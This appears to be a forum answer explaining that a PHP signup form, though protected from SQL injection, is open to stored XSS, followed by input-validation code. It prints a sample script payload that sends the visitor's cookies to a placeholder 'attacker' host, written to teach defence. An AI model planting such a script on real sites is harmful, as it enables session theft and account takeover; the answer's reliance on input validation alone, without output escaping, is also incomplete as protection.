While a user cannot exploit the database by means of injection, it is still vulnerable by other means.
You don't check the validity of the data you put into your database. While it is not exactly required to do so but if I would submit this as an email address or phone number:
<script>
window.location='http://attacker/?cookie='+document.cookie
</script>
And you echo this out on your website and visit it, you will be redirected sending me your login cookies and now I can use that data to login as you and if by any chance you're the site admin... The type of attack is called XSS.
And by not checking the validity of the data, there are many ways to do so but take this as an example:
$phone = $_POST['user_phone'];
$email = $_POST['user_email'];
if (!filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
# if this is true, the email address has a correct format.
# see the filter_var manual for more information.
if(is_numeric($phone)){
$insert = $db->prepare(
'INSERT INTO user (user_email, user_phone)
VALUES (:user_email, :user_phone)'
);
$insert->bindValue(':user_email', $email, PDO::PARAM_STR);
$insert->bindValue(':user_phone', $phone, PDO::PARAM_STR);
if($insert->execute()){
echo 'success!';
} else {
echo 'failed to execute query.';
}
} else {
echo 'phone number is incorrect.';
}
} else {
echo 'email is not correct.';
}
With this code, any data saved will be valid. It does not say that the email address exists noor the phone number.
Since most XSS attacks rely on < to allow a Javascript execution, it is negated cause the < character is not allowed in an email address.
My advice, check if the data is what you expect it to be before saving it instead of storing it and fix the security issues later.
